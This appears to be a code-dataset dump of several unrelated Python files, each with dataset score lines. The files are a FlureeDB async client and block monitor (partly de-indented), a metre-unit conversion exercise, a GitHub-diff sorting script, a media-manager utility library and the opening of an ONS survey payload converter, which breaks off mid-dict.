                                counters[operation["_id"]] += 1
                                # Match against the "$n" suffixed alternative name.
                                altname = operation["_id"] + "$" + str(counters[operation["_id"]])
                                if altname == tmp_id:
                                    obj_tx[real_id] = operation
                            elif isinstance(operation["_id"], list):
                                # Two-element _id lists are matched against their
                                # '["a" "b"]' string rendering used by tempids.
                                if len(operation["_id"]) == 2:
                                    txid = '["' + operation["_id"][0] + '" "' + operation["_id"][1] + '"]'
                                    if txid == tmp_id:
                                        obj_tx[real_id] = operation
        if len(operations) == 1:
            # Single-operation transaction: usable as fallback for any object.
            obj_tx[""] = operations[0]
        for operation in operations:
            if isinstance(operation, dict) and "_id" in operation:
                # Integer _ids address existing objects directly.
                if isinstance(operation["_id"], int):
                    obj_tx[operation["_id"]] = operation
        return obj_tx
    async def _do_instant_monitor(self, oldinstant, newinstant, blockno):
        """Fire instant-monitor callbacks for instants falling between two block times.

        Parameters
        ----------
        oldinstant : int
            Previous block instant (window start, exclusive).
        newinstant : int
            Current block instant (window end, inclusive).
        blockno : int
            Block number used to pin the query to a consistent snapshot.
        """
        for monitor in self.monitor["instant_monitors"]:
            # Entries are [predicate, offset_in_milliseconds, callback],
            # as appended by monitor_instant.
            predicate = monitor[0]
            offset = monitor[1]
            callback = monitor[2]
            # Shift the window back by the monitor's offset.
            windowstart = oldinstant - offset
            windowstop = newinstant - offset
            filt = "(and (> ?instant " + str(windowstart) + ") (<= ?instant " + str(windowstop) + "))"
            eventlist = await self.flureeql.query(
                select=[{"?whatever": ["*"]}],
                opts={"orderBy": ["ASC", "?instant"]},
                where=[
                    ["?whatever", predicate, "?instant"],
                    {"filter": [filt]}
                ],
                block=blockno
            )
            for event in eventlist:
                # Callbacks are awaited one by one, in instant order.
                await callback(event)
    async def _process_instant(self, instant, block, fromblock):
        """Track block instants and trigger instant monitors when time has passed.

        Parameters
        ----------
        instant : int
            Instant timestamp of the current block.
        block : int
            Number of the current block.
        fromblock : bool
            True when the instant came from an actual new block (forces processing).
        """
        minute = 60000
        timeout = 1*minute
        # NOTE: 'and' binds tighter than 'or', so this reads as: fromblock OR
        # (lastblock_instant is set AND more than a minute has passed since it).
        if (fromblock or
                self.monitor["lastblock_instant"] and
                self.monitor["lastblock_instant"] + timeout < instant):
            if self.monitor["lastblock_instant"]:
                await self._do_instant_monitor(self.monitor["lastblock_instant"], instant, block)
            self.monitor["lastblock_instant"] = instant
    async def _get_and_preprocess_block(self, blockno):
        """Fetch a block by block number and preprocess it

        Parameters
        ----------
        blockno : int
            Number of the block that needs to be fetched

        Returns
        -------
        list
            A grouped and predicate patched version of the fetched block.
        dict
            Object id to operation dict
        int
            Block instant; NOTE(review): this is whatever value the last-processed
            flakeset left in 'instant', so it may be None -- confirm intent.
        dict
            Block metadata (suffix of each "_block/<x>" predicate -> value).
        """
        # Fetch the new block
        block_data = await self.block.query(block=blockno)
        # Group by object; an unknown predicate id means the predicate map is
        # stale, so rebuild it once and retry.
        try:
            grouped = await self._group_block_flakes(block_data, blockno)
        except FlureeUnexpectedPredicateNumber:
            await self._build_predicates_map(blockno)
            grouped = await self._group_block_flakes(block_data, blockno)
        # Distill new ones using _tx/tempids
        obj_tx = {}
        block_meta = {}
        for obj in grouped:
            transactions = None
            tempids = None
            instant = None
            collection = self._get_flakeset_collection(grouped[obj])
            if collection == "_tx":
                transactions, tempids = self._get_transactions_and_temp_ids(grouped[obj])
            if collection == "_block":
                instant = self._get_block_instant(grouped[obj])
                # Collect "_block/<x>" metadata under its short name.
                for flake in grouped[obj]:
                    if len(flake[1].split("/")) > 1:
                        block_meta[flake[1].split("/")[1]] = flake[2]
            if transactions:
                obj_tx = self._get_object_id_to_operation_map(tempids, transactions)
            if instant:
                await self._process_instant(instant, blockno, True)
        return grouped, obj_tx, instant, block_meta
    async def _process_flakeset(self, collection, obj, obj_tx, blockno, block_meta):
        """Derive the CRUD action for one object's flakeset and invoke listeners.

        Parameters
        ----------
        collection : str
            name of the collection the object for this flakeset refers to
        obj : list
            The flakelist
        obj_tx : dict
            Dictionary mapping from object id to operation object.
        blockno : int
            Block number of the block currently being processed.
        block_meta : dict
            Block metadata forwarded verbatim to the listener callbacks.
        """
        # pylint: disable=too-many-branches,too-many-statements
        operation = None
        action = None
        previous = None
        latest = None
        # Look up the operation for this object id; "" acts as a wildcard.
        if obj[0][0] in obj_tx:
            operation = obj_tx[obj[0][0]]
        elif "" in obj_tx:
            operation = obj_tx[""]
        # Classify the flakes: assertions (flag True) vs retractions (False),
        # and whether any predicate involved is multi-valued.
        has_true = False
        has_false = False
        has_multi = False
        for flake in obj:
            if flake[4]:
                has_true = True
            else:
                has_false = True
            if flake[1] in self.monitor["predicate_map_multi"]:
                if self.monitor["predicate_map_multi"][flake[1]]:
                    has_multi = True
        if self.monitor["always_query_object"]:
            # Expensive path: query the object both before and after the
            # block, and derive the action from which states exist.
            previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
            if previous:
                previous = previous[0]
                action = "update"
            else:
                previous = None
            latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
            if latest:
                latest = latest[0]
            else:
                latest = None
            if previous is None:
                action = "insert"
            elif latest is None:
                action = "delete"
            else:
                action = "update"
        # Cheap heuristics, applied in priority order until an action sticks.
        if operation and "_action" in operation and operation["_action"] != "upsert" and not has_multi:
            action = operation["_action"]
        if action is None and has_true and has_false:
            action = "update"
        if action is None and operation and "_id" in operation and isinstance(operation["_id"], str):
            action = "insert"
        if action is None and operation and has_false and not has_true:
            # A lone retraction of a multi predicate is an update, not a delete.
            if len(obj) == 1 and has_multi:
                action = "update"
            else:
                action = "delete"
        if action is None and has_true and not has_false:
            if blockno > 1:
                previous = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno-1)
                if previous:
                    previous = previous[0]
                    action = "update"
                else:
                    previous = None
                    action = "insert"
            else:
                previous = None
                action = "insert"
        if action is None:
            # Last resort: decide by whether the object still exists.
            latest = await self.flureeql.query(select=["*"], ffrom=obj[0][0], block=blockno)
            if latest:
                latest = latest[0]
                action = "update"
            else:
                latest = None
                action = "delete"
        # Dispatch to the registered Create/Update/Delete listeners.
        if action == "insert" and "C" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["C"]:
                await callback(obj_id=obj[0][0], flakes=obj, new_obj=latest, operation=operation, block_meta=block_meta)
        elif action == "update" and "U" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["U"]:
                await callback(obj_id=obj[0][0],
                               flakes=obj,
                               old_obj=previous,
                               new_obj=latest,
                               operation=operation,
                               block_meta=block_meta)
        elif action == "delete" and "D" in self.monitor["listeners"][collection]:
            for callback in self.monitor["listeners"][collection]["D"]:
                await callback(obj_id=obj[0][0], flakes=obj, old_obj=previous, operation=operation, block_meta=block_meta)
    async def monitor_untill_stopped(self):
        """Run the block event monitor until stopped

        Raises
        ------
        NotImplementedError
            Currently raised when rewinding is specified.
        RuntimeError
            Raised either when there are no listeners set, or if there are too many errors.
        """
        # pylint: disable=too-many-nested-blocks, too-many-branches, too-many-return-statements
        if (not bool(self.monitor["listeners"])) and (not bool(self.monitor["instant_monitors"])):
            raise RuntimeError("Can't start monitor with zero registered listeners")
        # Set running to true. We shall abort when it is set to false.
        self.monitor["running"] = True
        await self._figure_out_next_block()
        if not self.monitor["running"]:
            return
        startblock = await self._find_start_block() + 1
        if not self.monitor["running"]:
            return
        # First make a dict from the _predicate collection.
        if startblock > 1:
            await self._build_predicates_map(startblock - 1)
        if not self.monitor["running"]:
            return
        noblocks = True
        # Seed the instant monitor from the last processed block if needed.
        if startblock > 1 and self.monitor["instant_monitors"] and self.monitor["lastblock_instant"] is None:
            self.monitor["lastblock_instant"] = await self._get_block_instant_by_blockno(startblock-1)
        if not self.monitor["running"]:
            return
        stats_error_count = 0
        last_instant = 0
        while self.monitor["running"]:
            # If we had zero blocks to process the last time around, wait a full second before
            # polling again if there are new blocks.
            if noblocks:
                await asyncio.sleep(1)
                if not self.monitor["running"]:
                    return
                # Drive the instant monitor from wall-clock time while idle.
                await self._process_instant(int(time.time()*1000), startblock - 1, False)
                now = int(time.time()*1000)
                if now - last_instant >= 59500:  # Roughly one minute
                    last_instant = now
                    await self.monitor["on_block_processed"](startblock - 1, now)
                if not self.monitor["running"]:
                    return
            noblocks = True
            endblock, stats_error_count = await self._get_endblock()
            if not self.monitor["running"]:
                return
            if endblock:
                if endblock >= startblock:
                    noblocks = False
                    for block in range(startblock, endblock + 1):
                        grouped, obj_tx, instant, block_meta = await self._get_and_preprocess_block(block)
                        # Process per object.
                        for obj in grouped:
                            if obj > 0:
                                collection = self._get_flakeset_collection(grouped[obj])
                                if collection in self.monitor["listeners"]:
                                    await self._process_flakeset(collection, grouped[obj], obj_tx, block, block_meta)
                            if not self.monitor["running"]:
                                return
                        # Call the persistence layer.
                        await self.monitor["on_block_processed"](block, instant)
                        last_instant = instant
                    # Set the new start block.
                    startblock = endblock + 1
            else:
                # ledger_stats failed; tolerate up to 100 consecutive errors.
                stats_error_count += 1
                if stats_error_count > 100:
                    raise RuntimeError("Too many errors from ledger_stats call")
async def ready(self):
"""Awaitable that polls the database untill the schema contains collections"""
while True:
try:
await self.flureeql.query(
select=["_collection/name"],
ffrom="_collection"
)
return
except FlureeHttpError:
await asyncio.sleep(0.1)
    async def __aexit__(self, exc_type, exc, traceback):
        """Async context-manager exit: close the underlying HTTP(S) session."""
        await self.close_session()
    async def __aenter__(self):
        """Method for allowing 'async with' constructs

        Returns
        -------
        _FlureeDbClient
            this fluree DB client
        """
        return self
async def close_session(self):
"""Close HTTP(S) session to FlureeDB"""
if self.session:
await self.session.close()
return
def __dir__(self):
"""Dir function for class
Returns
-------
list
List of defined (pseudo) attributes
"""
return list(self.known_endpoints) + ["close_session",
"__init__",
"__dir__",
"__getattr__",
" __aenter__",
" __aexit__"]
def __getattr__(self, api_endpoint):
# pylint: disable=too-many-statements
"""Select API endpoint
Parameters
----------
api_endpoint : string
Name of the API endpoint.
Returns
-------
object
Endpoint object suitable for API endpoint.
Raises
------
NotImplementedError
Defined endpoint without library implementation (for now)
AttributeError
Undefined API endpoint invoked
FlureeKeyRequired
When 'command' endpoint is invoked in open-API mode.
"""
class _StringEndpoint:
def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
api_endpoint : string
Name of the API endpoint
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
If https, dont validate ssl certs.
"""
self.api_endpoint = api_endpoint
secure = ""
if client.https:
secure = "s"
self.url = "http" + \
secure + \
"://" + \
client.host + \
":" + \
str(client.port) + \
"/fdb/" + \
client.database + \
"/" + \
"-".join(api_endpoint.split("_"))
self.signer = client.signer
self.session = client.session
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server
Raises
------
FlureeHttpError
When HTTP status from fluree server is anything other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
return await resp.text()
async def header_signed(self, query_body):
"""Do a HTTP query using headers for signing
Parameters
----------
query_body : any
query body to sign using headers.
Returns
-------
string
Return body from server
"""
if self.signer:
body, headers, _ = self.signer.sign_query(query_body, querytype=self.api_endpoint)
else:
body = json.dumps(query_body, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def body_signed(self, transact_obj, deps=None):
"""Do a HTTP query using body envelope for signing
Parameters
----------
transact_obj : list
transaction to sign using body envelope.
deps: dict
FlureeDb debs
Returns
-------
string
Return body from server
"""
command = self.signer.sign_transaction(transact_obj, deps)
body = json.dumps(command, indent=4, sort_keys=True)
headers = {"content-type": "application/json"}
return await self._post_body_with_headers(body, headers)
async def empty_post_unsigned(self):
"""Do an HTTP POST without body and without signing
Returns
-------
string
Return body from server
"""
return await self._post_body_with_headers(None, None)
        class FlureeQlEndpointMulti:
            """Endpoint for JSON based (FlureeQl) multi-queries"""
            def __init__(self, client, ssl_verify_disabled, raw=None):
                """Constructor

                Parameters
                ----------
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                raw: dict
                    The whole raw multiquery
                """
                self.stringendpoint = _StringEndpoint("multi_query", client, ssl_verify_disabled)
                if raw:
                    self.multi_query = raw
                else:
                    self.multi_query = {}
            def __call__(self, raw=None):
                """Invoke as function object.

                Parameters
                ----------
                raw: dict
                    The whole raw multiquery

                Returns
                -------
                FlureeQlEndpointMulti
                    Pointer to self
                """
                if raw is not None:
                    self.multi_query = raw
                return self
            def __dir__(self):
                """Dir function for class

                Returns
                -------
                list
                    List of defined (pseudo) attributes
                """
                return ["__call__", "__dir__", "__init__"]
            def __getattr__(self, method):
                """query

                Parameters
                ----------
                method : string
                    subquery name

                Returns
                -------
                _FlureeQlSubQuery
                    Helper class for creating FlureeQl multi-queries.
                """
                return _FlureeQlSubQuery(self, method)
            async def query(self):
                """Do the actual multi-query

                Returns
                -------
                dict
                    The result from the multi-query
                """
                return_body = await self.stringendpoint.header_signed(self.multi_query)
                return json.loads(return_body)
        class FlureeQlEndpoint:
            """Endpoint for JSON based (FlureeQl) queries"""
            def __init__(self, api_endpoint, client, ssl_verify_disabled):
                """Constructor

                Parameters
                ----------
                api_endpoint : string
                    Name of the API endpoint
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                """
                if api_endpoint == "flureeql":
                    # "flureeql" is an alias for the plain "query" endpoint.
                    api_endpoint = "query"
                self.api_endpoint = api_endpoint
                self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
            def __dir__(self):
                """Dir function for class

                Returns
                -------
                list
                    List of defined (pseudo) attributes
                """
                return ["query", "actual_query", "__dir__", "__init__"]
            def __getattr__(self, method):
                """query

                Parameters
                ----------
                method : string
                    should be 'query'

                Returns
                -------
                _FlureeQlQuery
                    Helper class for creating FlureeQl queries.

                Raises
                ------
                AttributeError
                    When anything other than 'query' is provided as method.
                """
                if method != 'query':
                    raise AttributeError("FlureeQlEndpoint has no attribute named " + method)
                return _FlureeQlQuery(self)
            async def actual_query(self, query_object):
                """Execute a query with a python dict that should get JSON serialized and convert JSON
                response back into a python object

                Parameters
                ----------
                query_object : dict
                    JSON serializable query

                Returns
                -------
                dict
                    JSON decoded query response
                """
                return_body = await self.stringendpoint.header_signed(query_object)
                return json.loads(return_body)
        class CommandEndpoint:
            """Endpoint for FlureeQL command"""
            def __init__(self, api_endpoint, client, ssl_verify_disabled=False):
                """Constructor

                Parameters
                ----------
                api_endpoint : string
                    Name of the API endpoint
                client: object
                    The wrapping _FlureeDbClient
                ssl_verify_disabled: bool
                    When using https, don't validate ssl certs.
                """
                self.client = client
                self.stringendpoint = _StringEndpoint(api_endpoint, client, ssl_verify_disabled)
            async def transaction(self, transaction_obj, deps=None, do_await=True):
                """Transact with list of python dicts that should get serialized to JSON,
                returns a transaction handle for polling FlureeDB if needed.

                Parameters
                ----------
                transaction_obj : list
                    Transaction list
                deps: dict
                    FlureeDB deps
                do_await: bool
                    Do we wait for the transaction to complete, or do we fire and forget?

                Returns
                -------
                string
                    transaction ID of pending transaction

                Raises
                ------
                FlureeTransactionFailure
                    When transaction fails
                """
                tid = await self.stringendpoint.body_signed(transaction_obj, deps)
                # Strip the surrounding JSON string quotes from the returned id.
                tid = tid[1:-1]
                if not do_await:
                    return tid
                # Poll the _tx collection until the transaction result appears.
                while True:
                    status = await self.client.query.query(select=["*"], ffrom=["_tx/id", tid])
                    if status:
                        if "error" in status[0]:
                            raise FlureeTransactionFailure("Transaction failed:" + status[0]["error"])
                        if "_tx/error" in status[0]:
                            raise FlureeTransactionFailure("Transaction failed:" + status[0]["_tx/error"])
                        return status[0]
                    await asyncio.sleep(0.1)
class LedgerStatsEndpoint:
"""Endpoint for ledger_stats"""
def __init__(self, client, ssl_verify_disabled=False):
"""Constructor
Parameters
----------
client: object
The wrapping _FlureeDbClient
ssl_verify_disabled: bool
When using https, don't validata ssl certs.
"""
self.stringendpoint = _StringEndpoint('ledger_stats', client, ssl_verify_disabled)
async def __call__(self):
"""Send request to ledger-stats endpoint and retrieve result
Returns
-------
dict
json decode result from the server.
"""
return_body = await self.stringendpoint.empty_post_unsigned()
return json.loads(return_body)
        # Dispatch: validate the requested endpoint name, then hand back the
        # matching endpoint wrapper object.
        if api_endpoint not in self.known_endpoints:
            raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
        if api_endpoint not in self.implemented:
            raise NotImplementedError("No implementation yet for " + api_endpoint)
        if api_endpoint in ["command"]:
            # The signed command endpoint requires a private key.
            if self.signer is None:
                raise FlureeKeyRequired("Command endpoint not supported in open-API mode. privkey required!")
            return CommandEndpoint(api_endpoint, self, self.ssl_verify_disabled)
        if api_endpoint in ["multi_query"]:
            return FlureeQlEndpointMulti(self, self.ssl_verify_disabled)
        if api_endpoint == 'ledger_stats':
            return LedgerStatsEndpoint(self, self.ssl_verify_disabled)
        # All remaining endpoints behave like plain FlureeQL query endpoints.
        return FlureeQlEndpoint(api_endpoint, self, self.ssl_verify_disabled)
| 2.3125 | 2 |
ex008.py | iagoMaik/exPython | 0 | 12765080 | m = float(input('Digite um tamanho (em metros): '))
dm = m * 10
cm = m * 100
mm = m * 1000
dam = m / 10
hm = m / 100
km = m / 1000
print('convertendo...')
print('[dm] =', dm)
print('[cm] =', cm)
print('[mm] =', mm)
print('[dam] =', dam)
print('[hm] =', hm)
print('[km] =', km)
| 3.84375 | 4 |
scripts/format_github_data.py | mhagiwara/nanigonet | 62 | 12765081 | import json
import os
import sys
from collections import Counter
from pathlib import Path
TRAIN_DIR = Path('data/train')
def count_popular_languages():
    """Tally file extensions from stdin (one JSON record per line) and print
    them in descending order of frequency."""
    extension_counts = Counter(
        path_after.rsplit('.', 1)[-1]
        for line in sys.stdin
        for _, path_after in json.loads(line)['paths']
    )
    for extension, count in extension_counts.most_common():
        print(extension, count)
def main():
    """Split GitHub diff records from stdin into per-language training files.

    Reads one JSON record per line, filters diffs by length, maps each file
    extension to a language id and appends the diff to
    ``data/train/p-<lang_id>/github.txt``.
    """
    # Extension -> language-id mapping; extensions not listed are skipped.
    extension_mapping = {
        'c': 'c',
        'h': 'c',
        'cc': 'cpp',
        'cpp': 'cpp',
        'cs': 'cs',
        'css': 'css',
        'go': 'go',
        'hs': 'hs',
        'html': 'html',
        'java': 'java',
        'js': 'js',
        'm': 'm',
        'php': 'php',
        'py': 'py',
        'rb': 'rb',
        'rs': 'rs',
        'scala': 'scala',
        'sh': 'sh',
        'swift': 'swift',
        'ts': 'ts',
        'xml': 'xml',
    }
    lang_id_to_file = {}
    try:
        for line in sys.stdin:
            data = json.loads(line)
            for (_, diff_after), (_, path_after) in zip(data['diffs'], data['paths']):
                # Skip trivially small or overly large diffs.
                if len(diff_after.strip()) < 5 or len(diff_after) > 256:
                    continue
                extension = path_after.rsplit('.', 1)[-1]
                lang_id = extension_mapping.get(extension)
                if lang_id is None:
                    continue
                # exist_ok avoids the exists-then-create race of the old code.
                os.makedirs(TRAIN_DIR / f'p-{lang_id}', exist_ok=True)
                f = lang_id_to_file.get(lang_id)
                if f is None:
                    # One output file per language, kept open for the run.
                    f = open(TRAIN_DIR / f'p-{lang_id}' / 'github.txt', mode='w')
                    lang_id_to_file[lang_id] = f
                f.write(diff_after)
                f.write('\n')
    finally:
        # Bug fix: always close the output files, even when parsing raises
        # part-way through (previously they leaked on any exception).
        for f in lang_id_to_file.values():
            f.close()
if __name__ == '__main__':
main()
| 2.8125 | 3 |
lib/common.py | thk4711/mediamanager | 0 | 12765082 | <reponame>thk4711/mediamanager
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import time
import socket
import urllib.request
import os
import re
import argparse
import alsaaudio
import _thread
import select
import smbus
import errno
http_get_handler = None
#------------------------------------------------------------------------------#
# make a http get request #
#------------------------------------------------------------------------------#
def get_data(host,port,action):
    """HTTP GET 'http://host:port/action=<action>' and return the raw body.

    Returns the response body as bytes on success, or the string 'failed'
    when the port is closed or the request raises.  NOTE(review): callers
    must cope with the mixed bytes/str return type.
    """
    # check_port() answers "is the port NOT reachable?".
    if check_port(port, host):
        return('failed')
    url = 'http://' + host + ':' + str(port) + '/action=' + action
    try:
        data = urllib.request.urlopen(url).read()
    except:
        # Best effort: any network error degrades to the 'failed' marker.
        data = 'failed'
    return(data)
#------------------------------------------------------------------------------#
# get command line args for frontend #
#------------------------------------------------------------------------------#
def init_frontend():
    """Parse frontend command line args and initialise the ALSA mixer.

    Side effects: sets the module globals `mixer`, `volume`, `old_volume`
    and `blocked`.

    Returns
    -------
    argparse.Namespace
        The parsed command line arguments.
    """
    global mixer
    global volume
    global old_volume
    global blocked
    blocked = False
    parser = argparse.ArgumentParser(description='media helper')
    parser.add_argument('-p', '--port', type=int, help='manager port', required=True)
    parser.add_argument('-ho', '--host', type=str, help='manager host', required=False, default='localhost')
    parser.add_argument('-m', '--mixer', type=str, help='volume mixer name', required=True)
    parser.add_argument('-c', '--configport', type=int, help='management port of frontend', required=True)
    args = parser.parse_args()
    mixer_name = args.mixer
    mixer = alsaaudio.Mixer(mixer_name)
    # Seed the cached volume from the current hardware mixer level.
    alsa_val = mixer.getvolume()
    value = alsa_val[0]
    volume = value
    old_volume = -1
    return(args)
#------------------------------------------------------------------------------#
# watch volume changes #
#------------------------------------------------------------------------------#
def control_watch():
    """Poll the ALSA mixer forever and mirror hardware volume changes into
    the module global `volume`.  Polling pauses while `blocked` is True."""
    global volume
    poll = select.poll()
    descriptors = mixer.polldescriptors()
    poll.register(descriptors[0][0])
    while True:
        if blocked == False:
            # Block until the mixer reports an event, then refresh the cache.
            events = poll.poll()
            mixer.handleevents()
            for e in events:
                alsa_val = mixer.getvolume()
                value = alsa_val[0]
                volume = value
        time.sleep(0.5)
#------------------------------------------------------------------------------#
# start thread for watching volume change #
#------------------------------------------------------------------------------#
def run_control_watch():
    """Start control_watch() in a background thread (fire-and-forget)."""
    try:
        _thread.start_new_thread( control_watch, () )
    except:
        # Thread creation failed; report and continue without volume watching.
        print("Error: unable to start thread control watch")
#------------------------------------------------------------------------------#
# check if port is open #
#------------------------------------------------------------------------------#
def check_port(port,host):
    """Return True when `port` on `host` is NOT accepting TCP connections.

    Note the inverted sense: the function answers "is it *not* working?",
    which matches existing callers such as get_data().
    """
    # Bug fix: use a context manager so the socket is always closed (the
    # previous version leaked one file descriptor per call).
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        result = sock.connect_ex((host, port))
    is_not_working = result != 0
    if is_not_working:
        print('Port', port, 'is not open')
    return is_not_working
#------------------------------------------------------------------------------#
# http request handler #
#------------------------------------------------------------------------------#
class Server(BaseHTTPRequestHandler):
    """Minimal HTTP handler that delegates every GET to the module-level
    `http_get_handler` callback (set by the embedding application)."""
    def _set_headers(self):
        # Derive the Content-type from the requested path's extension.
        self.send_response(200)
        path = self.path
        if '.css' in path:
            self.send_header('Content-type', 'text/css')
        elif '.js' in path:
            self.send_header('Content-type', 'text/javascript')
        else:
            self.send_header('Content-type', 'text/html')
        self.end_headers()

    # process get requests
    def do_GET(self):
        self._set_headers()
        path = self.path
        # http_get_handler receives the parsed key/value path and must
        # return a bytes body.
        data = http_get_handler(split_path(path))
        self.wfile.write(data)

    # send header
    def do_HEAD(self):
        self._set_headers()

    def log_message(self, format, *args):
        # Silence the default per-request stderr logging.
        return
#------------------------------------------------------------------------------#
# run the http server in backgroung #
#------------------------------------------------------------------------------#
def run_http(port):
    """Serve HTTP requests on `port` in a daemon thread; returns immediately."""
    httpd = HTTPServer(('', port), Server)
    worker = threading.Thread(target=httpd.serve_forever)
    worker.daemon = True
    worker.start()
#------------------------------------------------------------------------------#
# split path #
#------------------------------------------------------------------------------#
def split_path(path):
    """Parse '/key1=val1/key2=val2' into a dict.

    Segments that are not exactly one 'key=value' pair (no '=' at all, or
    two or more '=' separators) are silently skipped, as before.
    """
    data = {}
    for segment in path[1:].split('/'):
        parts = segment.split('=', 2)
        if len(parts) == 2:
            data[parts[0]] = parts[1]
    return data
#------------------------------------------------------------------------------#
# read config file #
#------------------------------------------------------------------------------#
def read_config(config_file):
    """Parse an INI-like config file into {section: {key: value}}.

    Values 'True'/'False' become booleans and all-digit values become ints;
    everything else stays a string.  Exits the process when the file does
    not exist.
    """
    if not os.path.isfile(config_file):
        print('ERROR config file', config_file, 'does not exist')
        exit(1)
    conf = {}
    section = ''
    with open(config_file) as handle:
        lines = handle.readlines()
    for raw_line in lines:
        line = raw_line.strip()
        if line.startswith("#"):
            continue
        if line.startswith("["):
            # New section header: "[name]".
            section = re.findall(r"^\[(.+)\]$", line)[0]
            conf[section] = {}
            continue
        if '=' not in line:
            continue
        key, value = line.split('=', 1)
        key = key.strip()
        value = value.strip()
        if value == 'True':
            value = True
        elif value == 'False':
            value = False
        elif re.match(r'^([\d]+)$', value):
            value = int(value)
        conf[section][key] = value
    return conf
#-----------------------------------------------------------------#
# extract hardware config from config #
#-----------------------------------------------------------------#
def get_hardware_conf(conf):
    """Group [hardware] entries of the form 'name = type:number' by type.

    Returns {type: {name: number}}; an absent 'hardware' section yields {}.
    """
    hardware = {}
    for name, spec in conf.get('hardware', {}).items():
        hw_type, number_string = spec.split(':', 1)
        hardware.setdefault(hw_type, {})[name] = int(number_string)
    return hardware
#-----------------------------------------------------------------#
# check if i2c device is present #
#-----------------------------------------------------------------#
def check_smbus(device_address, bus_number = 1):
    """Probe the i2c bus for a device; exit the process when it is absent.

    Parameters
    ----------
    device_address : int
        i2c address of the device to probe.
    bus_number : int
        i2c bus index (default 1, the usual Raspberry Pi bus).
    """
    try:
        bus = smbus.SMBus(bus_number)
        # A zero-byte write is the conventional presence probe.
        bus.write_byte(device_address, 0)
    except Exception:
        # Narrowed from a bare except so Ctrl-C is not swallowed.
        # Message typo fixed: 'fine' -> 'find'.
        print(f'unable to find i2c device {hex(device_address)} on bus {bus_number}')
        exit(1)
#-----------------------------------------------------------------#
# read GPIO usage of kernel modules #
#-----------------------------------------------------------------#
def get_kernel_gpio_usage():
    """Parse /sys/kernel/debug/gpio and map kernel GPIO usage labels to line
    numbers.

    Only lines belonging to 'gpiochip0' are considered.  Requires debugfs to
    be mounted and readable (usually root only).

    Returns
    -------
    dict
        {usage_label: gpio_number}
    """
    gpios = {}
    # Bug fix: use a context manager so the file is closed even when parsing
    # raises (the old manual close() was skipped on exceptions).
    with open('/sys/kernel/debug/gpio', 'r') as handle:
        lines = handle.readlines()
    in_chip0 = False
    for line in lines:
        # Collapse runs of whitespace for stable splitting.
        line = " ".join(line.split())
        if line.startswith('gpiochip'):
            # Track whether subsequent gpio- lines belong to gpiochip0.
            in_chip0 = line.startswith('gpiochip0')
        if line.startswith('gpio-') and in_chip0:
            parts = line.split()
            num = int(parts[0].replace('gpio-', ''))
            # Raw string fixes the invalid escape sequences ('\(', '\|')
            # the old non-raw pattern produced warnings for.
            result = re.search(r'\( \|(.*) \)', line)
            if result is None:
                # Previously an unlabelled line raised AttributeError on
                # .group(); skip such lines instead.
                continue
            gpios[result.group(1)] = num
    return gpios
| 2.25 | 2 |
app/submitter/converter.py | ONSdigital/eq-questionnaire-runner | 3 | 12765083 | from typing import Mapping
from structlog import get_logger
from app.questionnaire.questionnaire_schema import DEFAULT_LANGUAGE_CODE
from app.submitter.convert_payload_0_0_1 import convert_answers_to_payload_0_0_1
from app.submitter.convert_payload_0_0_3 import convert_answers_to_payload_0_0_3
logger = get_logger()
class DataVersionError(Exception):
    """Raised when the schema's data_version has no payload converter."""

    def __init__(self, version):
        super().__init__()
        # Keep the offending version around for the message and for callers.
        self.version = version

    def __str__(self):
        return "Data version {} not supported".format(self.version)
def convert_answers(
    schema, questionnaire_store, routing_path, submitted_at, flushed=False
):
    """
    Create the JSON answer format for down stream processing in the following format:
    ```
    {
        'tx_id': '0f534ffc-9442-414c-b39f-a756b4adc6cb',
        'type' : 'uk.gov.ons.edc.eq:surveyresponse',
        'version' : '0.0.1',
        'origin' : 'uk.gov.ons.edc.eq',
        'survey_id': '021',
        'flushed': true|false
        'collection':{
            'exercise_sid': 'hfjdskf',
            'schema_name': 'yui789',
            'period': '2016-02-01'
        },
        'started_at': '2016-03-06T15:28:05Z',
        'submitted_at': '2016-03-07T15:28:05Z',
        'launch_language_code': 'en',
        'channel': 'RH',
        'metadata': {
            'user_id': '789473423',
            'ru_ref': '432423423423'
        },
        'data': [
            ...
        ],
    }
    ```
    Args:
        schema: QuestionnaireSchema instance with populated schema json
        questionnaire_store: EncryptedQuestionnaireStorage instance for accessing current questionnaire data
        routing_path: The full routing path followed by the user when answering the questionnaire
        submitted_at: The date and time of submission
        flushed: True when system submits the users answers, False when submitted by user.
    Returns:
        Data payload

    Raises:
        DataVersionError: when the schema's data_version is not 0.0.1 or 0.0.3.
    """
    metadata = questionnaire_store.metadata
    response_metadata = questionnaire_store.response_metadata
    answer_store = questionnaire_store.answer_store
    list_store = questionnaire_store.list_store

    survey_id = schema.json["survey_id"]

    payload = {
        "case_id": metadata["case_id"],
        "tx_id": metadata["tx_id"],
        "type": "uk.gov.ons.edc.eq:surveyresponse",
        "version": schema.json["data_version"],
        "origin": "uk.gov.ons.edc.eq",
        "survey_id": survey_id,
